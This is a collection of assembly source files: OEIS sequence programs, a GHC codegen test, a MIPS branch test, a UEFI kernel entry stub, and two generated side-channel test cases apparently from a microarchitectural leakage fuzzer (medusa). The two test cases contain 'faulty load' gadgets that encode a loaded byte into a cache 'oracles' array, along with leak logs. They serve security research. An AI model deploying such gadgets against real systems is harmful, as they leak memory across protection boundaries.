TheStack | b81654cb6ad6b763f4e854d7292692ec1520cbd1 | Assemblycode:Assembly | {"size": 136, "ext": "asm", "max_stars_repo_path": "testsuite/tests/codeGen/should_gen_asm/bytearray-memcpy-unroll.asm", "max_stars_repo_name": "JakobBruenker/ghc", "max_stars_repo_stars_event_min_datetime": "2017-01-12T14:08:50.000Z", "max_stars_repo_stars_event_max_datetime": "2021-03-24T06:01:41.000Z", "max_issues_repo_path": "testsuite/tests/codeGen/should_gen_asm/bytearray-memcpy-unroll.asm", "max_issues_repo_name": "JakobBruenker/ghc", "max_issues_repo_issues_event_min_datetime": "2017-07-05T14:35:23.000Z", "max_issues_repo_issues_event_max_datetime": "2021-07-30T13:23:00.000Z", "max_forks_repo_path": "testsuite/tests/codeGen/should_gen_asm/bytearray-memcpy-unroll.asm", "max_forks_repo_name": "JakobBruenker/ghc", "max_forks_repo_forks_event_min_datetime": "2017-04-28T21:17:26.000Z", "max_forks_repo_forks_event_max_datetime": "2020-02-23T00:32:09.000Z"} | {"max_stars_count": 51, "max_issues_count": 296, "max_forks_count": 6, "avg_line_length": 15.1111111111, "max_line_length": 16, "alphanum_fraction": 0.5882352941} | movw 0(%rax),%dx
movw %dx,0(%rcx)
movw 2(%rax),%dx
movw %dx,2(%rcx)
movw 4(%rax),%dx
movw %dx,4(%rcx)
movw 6(%rax),%ax
movw %ax,6(%rcx)
|
||||
TheStack | 80978ad052de5979ff6db5b3db63f2ba1db81943 | Assemblycode:Assembly | {"size": 318, "ext": "asm", "max_stars_repo_path": "programs/oeis/010/A010123.asm", "max_stars_repo_name": "neoneye/loda", "max_stars_repo_stars_event_min_datetime": "2018-02-06T19:19:31.000Z", "max_stars_repo_stars_event_max_datetime": "2022-01-17T21:53:31.000Z", "max_issues_repo_path": "programs/oeis/010/A010123.asm", "max_issues_repo_name": "neoneye/loda", "max_issues_repo_issues_event_min_datetime": "2021-02-22T19:00:34.000Z", "max_issues_repo_issues_event_max_datetime": "2021-08-28T10:47:47.000Z", "max_forks_repo_path": "programs/oeis/010/A010123.asm", "max_forks_repo_name": "neoneye/loda", "max_forks_repo_forks_event_min_datetime": "2021-02-24T21:14:16.000Z", "max_forks_repo_forks_event_max_datetime": "2021-08-09T19:48:05.000Z"} | {"max_stars_count": 22, "max_issues_count": 41, "max_forks_count": 5, "avg_line_length": 26.5, "max_line_length": 201, "alphanum_fraction": 0.534591195} | ; A010123: Continued fraction for sqrt(14).
; 3,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1,6,1,2,1
add $0,1
mul $0,2
lpb $0
mul $0,3
sub $0,1
mod $0,8
lpe
add $0,1
|
||||
TheStack | f9810d7add7cd851c7bffab4dba6eeb574972b66 | Assemblycode:Assembly | {"size": 146, "ext": "asm", "max_stars_repo_path": "other.7z/NEWS.7z/NEWS/テープリストア/NEWS_05/NEWS_05.tar/home/kimura/kart/risc.lzh/risc/join/Result-p.asm", "max_stars_repo_name": "prismotizm/gigaleak", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "other.7z/NEWS.7z/NEWS/テープリストア/NEWS_05/NEWS_05.tar/home/kimura/kart/risc.lzh/risc/join/Result-p.asm", "max_issues_repo_name": "prismotizm/gigaleak", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "other.7z/NEWS.7z/NEWS/テープリストア/NEWS_05/NEWS_05.tar/home/kimura/kart/risc.lzh/risc/join/Result-p.asm", "max_forks_repo_name": "prismotizm/gigaleak", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 20.8571428571, "max_line_length": 47, "alphanum_fraction": 0.8082191781} | Name: Result-p.asm
Type: file
Size: 70355
Last-Modified: '1992-07-30T05:00:34Z'
SHA-1: 1642A09839B5D788E4A4D9C33C433F41E5841AC1
Description: null
|
||||
TheStack | 670e25b80fdc7d1fc1f6bdf2009c926dea5d7636 | Assemblycode:Assembly | {"size": 630, "ext": "asm", "max_stars_repo_path": "oeis/001/A001778.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/001/A001778.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/001/A001778.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 42.0, "max_line_length": 464, "alphanum_fraction": 0.8507936508} | ; A001778: Lah numbers: n!*binomial(n-1,5)/6!.
; Submitted by Jon Maiga
; 1,42,1176,28224,635040,13970880,307359360,6849722880,155831195520,3636061228800,87265469491200,2157837063782400,55024845126451200,1447576694865100800,39291367432052736000,1100158288097476608000,31767070568814637056000,945537512224718020608000,28996483708224685965312000,915678432891305872588800000,29759549068967440859136000000,994819211734054451576832000000,34185605639588416608731136000000,1206900512145469316795203584000000,43750143565273262733826129920000000
mov $1,$0
add $1,5
mov $0,$1
bin $0,5
add $1,1
lpb $1
mul $0,$1
sub $1,1
lpe
div $0,720
|
||||
TheStack | 6a1ef85251093099324c4c10e93dd2a180873c42 | Assemblycode:Assembly | {"size": 652, "ext": "asm", "max_stars_repo_path": "test/naive-tests/4-branch.asm", "max_stars_repo_name": "skyzh/mips-simulator", "max_stars_repo_stars_event_min_datetime": "2020-04-02T05:15:53.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-13T14:15:32.000Z", "max_issues_repo_path": "test/naive-tests/4-branch.asm", "max_issues_repo_name": "skyzh/mips-simulator", "max_issues_repo_issues_event_min_datetime": "2020-04-04T10:12:11.000Z", "max_issues_repo_issues_event_max_datetime": "2020-04-04T10:12:11.000Z", "max_forks_repo_path": "test/naive-tests/4-branch.asm", "max_forks_repo_name": "skyzh/mips-simulator", "max_forks_repo_forks_event_min_datetime": "2020-12-27T21:15:20.000Z", "max_forks_repo_forks_event_max_datetime": "2020-12-27T21:15:20.000Z"} | {"max_stars_count": 35, "max_issues_count": 1, "max_forks_count": 1, "avg_line_length": 19.7575757576, "max_line_length": 32, "alphanum_fraction": 0.7745398773} | li $v0, 100
li $v1, 50
li $a1, -50
beq $v0, $v0, beq_test_success
li $t0, 233
beq_test_success:
bne $v0, $v1, bne_test_success
li $t1, 233
bne_test_success:
bgez $zero, bgez_test_success_1
li $t2, 233
bgez_test_success_1:
bgez $v0, bgez_test_success_2
li $t2, 233
bgez_test_success_2:
bgtz $v0, bgtz_test_success
li $t3, 233
bgtz_test_success:
ble $v1, $v0, ble_test_success_1
li $t4, 233
ble_test_success_1:
ble $v1, $v1, ble_test_success
li $t4, 233
ble_test_success:
bltz $a1, bltz_test_success
li $t6, 233
bltz_test_success:
blez $zero, blez_test_success_1
li $t7, 233
blez_test_success_1:
blez $a1, blez_test_success
li $t7, 233
blez_test_success: |
||||
TheStack | 52f39dd1771900cdcc9248aaf2448cf015549180 | Assemblycode:Assembly | {"size": 358, "ext": "asm", "max_stars_repo_path": "programs/oeis/328/A328260.asm", "max_stars_repo_name": "neoneye/loda", "max_stars_repo_stars_event_min_datetime": "2018-02-06T19:19:31.000Z", "max_stars_repo_stars_event_max_datetime": "2022-01-17T21:53:31.000Z", "max_issues_repo_path": "programs/oeis/328/A328260.asm", "max_issues_repo_name": "neoneye/loda", "max_issues_repo_issues_event_min_datetime": "2021-02-22T19:00:34.000Z", "max_issues_repo_issues_event_max_datetime": "2021-08-28T10:47:47.000Z", "max_forks_repo_path": "programs/oeis/328/A328260.asm", "max_forks_repo_name": "neoneye/loda", "max_forks_repo_forks_event_min_datetime": "2021-02-24T21:14:16.000Z", "max_forks_repo_forks_event_max_datetime": "2021-08-09T19:48:05.000Z"} | {"max_stars_count": 22, "max_issues_count": 41, "max_forks_count": 5, "avg_line_length": 44.75, "max_line_length": 220, "alphanum_fraction": 0.656424581} | ; A328260: a(n) = n * omega(n).
; 0,2,3,4,5,12,7,8,9,20,11,24,13,28,30,16,17,36,19,40,42,44,23,48,25,52,27,56,29,90,31,32,66,68,70,72,37,76,78,80,41,126,43,88,90,92,47,96,49,100,102,104,53,108,110,112,114,116,59,180,61,124,126,64,130,198,67,136,138,210
mov $1,$0
add $0,1
seq $1,1221 ; Number of distinct primes dividing n (also called omega(n)).
mul $0,$1
|
||||
TheStack | 87cfeafed8d51f65451eafd35c68d7271008bcd7 | Assemblycode:Assembly | {"size": 5293, "ext": "asm", "max_stars_repo_path": "Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_250.asm", "max_stars_repo_name": "ljhsiun2/medusa", "max_stars_repo_stars_event_min_datetime": "2020-08-13T19:41:58.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-30T12:22:51.000Z", "max_issues_repo_path": "Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_250.asm", "max_issues_repo_name": "ljhsiun2/medusa", "max_issues_repo_issues_event_min_datetime": "2021-04-29T06:29:35.000Z", "max_issues_repo_issues_event_max_datetime": "2021-05-13T21:02:30.000Z", "max_forks_repo_path": "Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_250.asm", "max_forks_repo_name": "ljhsiun2/medusa", "max_forks_repo_forks_event_min_datetime": "2020-07-14T17:07:07.000Z", "max_forks_repo_forks_event_max_datetime": "2022-03-21T01:12:22.000Z"} | {"max_stars_count": 9, "max_issues_count": 1, "max_forks_count": 3, "avg_line_length": 43.0325203252, "max_line_length": 2999, "alphanum_fraction": 0.6627621387} | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r8
push %rax
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WC_ht+0xc536, %rdx
nop
nop
cmp $21210, %rax
movw $0x6162, (%rdx)
nop
nop
nop
nop
add $54942, %r8
lea addresses_WT_ht+0x1609a, %rsi
lea addresses_WT_ht+0xe0ae, %rdi
nop
nop
nop
nop
sub %rbp, %rbp
mov $43, %rcx
rep movsq
nop
nop
nop
nop
dec %rdi
lea addresses_WC_ht+0xc1b6, %rdi
clflush (%rdi)
nop
nop
cmp %rbp, %rbp
movups (%rdi), %xmm4
vpextrq $1, %xmm4, %rcx
nop
nop
xor %r8, %r8
lea addresses_D_ht+0xadb6, %rdx
nop
nop
nop
cmp $23794, %rbp
mov $0x6162636465666768, %r11
movq %r11, %xmm0
and $0xffffffffffffffc0, %rdx
vmovaps %ymm0, (%rdx)
nop
dec %rbp
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %rax
pop %r8
pop %r11
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r15
push %rbp
push %rbx
push %rcx
push %rdi
push %rsi
// REPMOV
lea addresses_D+0x1f7b6, %rsi
lea addresses_normal+0x1fb36, %rdi
lfence
mov $88, %rcx
rep movsl
nop
nop
nop
sub $14181, %rcx
// Faulty Load
lea addresses_PSE+0x115b6, %rbx
nop
nop
dec %rcx
vmovups (%rbx), %ymm2
vextracti128 $0, %ymm2, %xmm2
vpextrq $0, %xmm2, %rdi
lea oracles, %r15
and $0xff, %rdi
shlq $12, %rdi
mov (%r15,%rdi,1), %rdi
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %rbp
pop %r15
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'src': {'type': 'addresses_PSE', 'AVXalign': True, 'size': 32, 'NT': True, 'same': False, 'congruent': 0}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_D', 'congruent': 8, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_normal', 'congruent': 5, 'same': False}}
[Faulty Load]
{'src': {'type': 'addresses_PSE', 'AVXalign': False, 'size': 32, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 7}}
{'src': {'type': 'addresses_WT_ht', 'congruent': 2, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WT_ht', 'congruent': 2, 'same': False}}
{'src': {'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 16, 'NT': False, 'same': False, 'congruent': 10}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'AVXalign': True, 'size': 32, 'NT': False, 'same': False, 'congruent': 10}}
{'33': 21829}
33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
*/
|
||||
TheStack | 501257f5c9b173d1a75af95ba846032a37720ae8 | Assemblycode:Assembly | {"size": 2829, "ext": "asm", "max_stars_repo_path": "sources/supervisor/kernel/src/start.asm", "max_stars_repo_name": "twrl/conurbation", "max_stars_repo_stars_event_min_datetime": "2016-05-17T23:03:06.000Z", "max_stars_repo_stars_event_max_datetime": "2019-07-24T18:23:00.000Z", "max_issues_repo_path": "sources/supervisor/kernel/src/start.asm", "max_issues_repo_name": "twrl/conurbation", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "sources/supervisor/kernel/src/start.asm", "max_forks_repo_name": "twrl/conurbation", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 5, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 19.2448979592, "max_line_length": 74, "alphanum_fraction": 0.5846588901} | [BITS 64]
[EXTERN _GLOBAL_OFFSET_TABLE_]
[EXTERN __preinit_array_start]
[EXTERN __preinit_array_end]
[EXTERN __init_array_start]
[EXTERN __init_array_end]
[EXTERN __fini_array_start]
[EXTERN __fini_array_end]
[EXTERN _main]
;[EXTERN __cxa_finalize]
[SECTION .text.startup]
[GLOBAL _start:function (_start.end - _start)]
_start:
sub rsp, 32
mov [_uefi_image_handle wrt ..sym], rcx
mov [_uefi_system_table_ptr wrt ..sym], rdx
mov rdi, [__preinit_array_start wrt ..sym]
mov rsi, [__preinit_array_end wrt ..sym]
call fun_array_preinit
mov rdi, [__init_array_start wrt ..sym]
mov rsi, [__init_array_end wrt ..sym]
call fun_array_preinit
mov rdi, [_uefi_image_handle wrt ..sym]
mov rsi, [_uefi_system_table_ptr wrt ..sym]
call _main
push rax
mov rdi, [__fini_array_start wrt ..sym]
mov rsi, [__fini_array_end wrt ..sym]
call fun_array_rev
; xor rdi, rdi
; call __cxa_finalize
pop rax
add rsp, 32
ret
.end:
fun_array_preinit:
push r12
push r13
push r15
mov r12, rdi
mov r13, rsi
.begin_loop:
cmp r12, r13
je .end_loop
mov r15, [r12]
mov rdi, [_uefi_image_handle]
mov rsi, [_uefi_system_table_ptr]
call r15
add r12, 8
jmp .begin_loop
.end_loop:
pop r15
pop r13
pop r12
ret
.end:
fun_array_fwd:
push r12
push r13
push r15
mov r12, rdi
mov r13, rsi
.begin_loop:
cmp r12, r13
je .end_loop
mov r15, [r12]
call r15
add r12, 8
jmp .begin_loop
.end_loop:
pop r15
pop r13
pop r12
ret
.end:
fun_array_rev:
push r12
push r13
push r15
mov r12, rdi
mov r13, rsi
.begin_loop:
cmp r12, r13
je .end_loop
sub r13, 8
mov r15, [r13]
call r15
jmp .begin_loop
.end_loop:
pop r15
pop r13
pop r12
ret
.end:
[GLOBAL enable_sse:function (enable_sse.end - enable_sse)]
enable_sse:
mov rax, cr0
and ax, 0xFFFB ;clear coprocessor emulation CR0.EM
or ax, 0x2 ;set coprocessor monitoring CR0.MP
mov cr0, rax
mov rax, cr4
or ax, 3 << 9 ;set CR4.OSFXSR and CR4.OSXMMEXCPT at the same time
mov cr4, rax
ret
.end:
[SECTION .preinit_array]
dq enable_sse
;[EXTERN preinit_liballoc]
;dq preinit_liballoc
;[EXTERN preinit_test]
;dq preinit_test
[SECTION .data]
[GLOBAL _uefi_image_handle:data 8]
[GLOBAL _uefi_system_table_ptr:data 8]
_uefi_image_handle: dq 0
_uefi_system_table_ptr: dq 0
|
||||
TheStack | a78348eb3b8816deb4a88bd4d95c82e15269f805 | Assemblycode:Assembly | {"size": 7889, "ext": "asm", "max_stars_repo_path": "Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_762.asm", "max_stars_repo_name": "ljhsiun2/medusa", "max_stars_repo_stars_event_min_datetime": "2020-08-13T19:41:58.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-30T12:22:51.000Z", "max_issues_repo_path": "Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_762.asm", "max_issues_repo_name": "ljhsiun2/medusa", "max_issues_repo_issues_event_min_datetime": "2021-04-29T06:29:35.000Z", "max_issues_repo_issues_event_max_datetime": "2021-05-13T21:02:30.000Z", "max_forks_repo_path": "Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_762.asm", "max_forks_repo_name": "ljhsiun2/medusa", "max_forks_repo_forks_event_min_datetime": "2020-07-14T17:07:07.000Z", "max_forks_repo_forks_event_max_datetime": "2022-03-21T01:12:22.000Z"} | {"max_stars_count": 9, "max_issues_count": 1, "max_forks_count": 3, "avg_line_length": 35.0622222222, "max_line_length": 2999, "alphanum_fraction": 0.6586386107} | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r14
push %r15
push %r8
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_WC_ht+0x6318, %rsi
lea addresses_normal_ht+0x131f8, %rdi
nop
nop
nop
nop
nop
dec %r15
mov $12, %rcx
rep movsq
nop
sub $51686, %r14
lea addresses_D_ht+0x130f8, %rsi
lea addresses_UC_ht+0x30b8, %rdi
nop
nop
nop
nop
nop
dec %r8
mov $117, %rcx
rep movsw
xor $3147, %r8
lea addresses_A_ht+0x74f8, %r14
nop
nop
cmp $56156, %rcx
movb (%r14), %r8b
inc %r14
lea addresses_A_ht+0x100f8, %rsi
lea addresses_WT_ht+0xaef8, %rdi
clflush (%rsi)
cmp %r14, %r14
mov $25, %rcx
rep movsb
nop
cmp $52909, %rcx
lea addresses_WC_ht+0x110f8, %rcx
nop
cmp $30138, %rbx
movups (%rcx), %xmm6
vpextrq $1, %xmm6, %rdi
and $41322, %rbx
lea addresses_WC_ht+0x1dbfc, %rbx
xor $5283, %rdi
vmovups (%rbx), %ymm6
vextracti128 $1, %ymm6, %xmm6
vpextrq $0, %xmm6, %r14
nop
nop
nop
nop
dec %r14
lea addresses_WC_ht+0xd078, %rsi
lea addresses_D_ht+0x14dec, %rdi
clflush (%rdi)
nop
nop
and %r11, %r11
mov $106, %rcx
rep movsq
nop
sub $41848, %rcx
lea addresses_normal_ht+0x8a8c, %r14
cmp %rcx, %rcx
movw $0x6162, (%r14)
nop
nop
nop
add %rcx, %rcx
lea addresses_WC_ht+0x1d8f8, %rdi
nop
nop
nop
and %r15, %r15
mov $0x6162636465666768, %r8
movq %r8, %xmm5
movups %xmm5, (%rdi)
nop
nop
nop
nop
cmp $29340, %rbx
lea addresses_D_ht+0x10278, %rbx
nop
nop
nop
nop
nop
sub $45927, %rsi
movl $0x61626364, (%rbx)
nop
xor %r15, %r15
lea addresses_WC_ht+0x160f8, %r11
nop
nop
nop
nop
add %r14, %r14
and $0xffffffffffffffc0, %r11
vmovaps (%r11), %ymm3
vextracti128 $0, %ymm3, %xmm3
vpextrq $0, %xmm3, %r8
cmp %rbx, %rbx
lea addresses_WT_ht+0x96d8, %rsi
lea addresses_WT_ht+0x150f8, %rdi
nop
nop
nop
nop
nop
and %r11, %r11
mov $101, %rcx
rep movsl
nop
nop
nop
dec %rcx
lea addresses_WT_ht+0x30a8, %rbx
dec %r11
mov (%rbx), %si
nop
nop
xor $31141, %r8
lea addresses_UC_ht+0x1bcf8, %rsi
lea addresses_WC_ht+0x1df78, %rdi
nop
nop
nop
nop
nop
inc %r11
mov $31, %rcx
rep movsb
nop
nop
nop
and %rdi, %rdi
lea addresses_WT_ht+0x9974, %r11
nop
nop
nop
nop
nop
sub $11982, %rbx
movb (%r11), %cl
nop
nop
xor %r11, %r11
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %r8
pop %r15
pop %r14
pop %r11
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r8
push %rbp
push %rcx
push %rdi
// Faulty Load
lea addresses_A+0x1a0f8, %r12
nop
nop
nop
nop
nop
sub $31199, %rcx
vmovups (%r12), %ymm7
vextracti128 $0, %ymm7, %xmm7
vpextrq $1, %xmm7, %rdi
lea oracles, %r12
and $0xff, %rdi
shlq $12, %rdi
mov (%r12,%rdi,1), %rdi
pop %rdi
pop %rcx
pop %rbp
pop %r8
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'src': {'NT': True, 'AVXalign': False, 'size': 2, 'congruent': 0, 'same': False, 'type': 'addresses_A'}, 'OP': 'LOAD'}
[Faulty Load]
{'src': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 0, 'same': True, 'type': 'addresses_A'}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'congruent': 5, 'same': False, 'type': 'addresses_WC_ht'}, 'dst': {'congruent': 5, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'REPM'}
{'src': {'congruent': 10, 'same': False, 'type': 'addresses_D_ht'}, 'dst': {'congruent': 6, 'same': False, 'type': 'addresses_UC_ht'}, 'OP': 'REPM'}
{'src': {'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 10, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 10, 'same': False, 'type': 'addresses_A_ht'}, 'dst': {'congruent': 7, 'same': False, 'type': 'addresses_WT_ht'}, 'OP': 'REPM'}
{'src': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 10, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'LOAD'}
{'src': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 2, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 6, 'same': True, 'type': 'addresses_WC_ht'}, 'dst': {'congruent': 2, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'REPM'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 2, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'STOR'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 8, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'STOR'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 7, 'same': True, 'type': 'addresses_D_ht'}, 'OP': 'STOR'}
{'src': {'NT': False, 'AVXalign': True, 'size': 32, 'congruent': 11, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 1, 'same': False, 'type': 'addresses_WT_ht'}, 'dst': {'congruent': 11, 'same': False, 'type': 'addresses_WT_ht'}, 'OP': 'REPM'}
{'src': {'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 4, 'same': False, 'type': 'addresses_WT_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 7, 'same': False, 'type': 'addresses_UC_ht'}, 'dst': {'congruent': 4, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'REPM'}
{'src': {'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 2, 'same': False, 'type': 'addresses_WT_ht'}, 'OP': 'LOAD'}
{'35': 21829}
35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 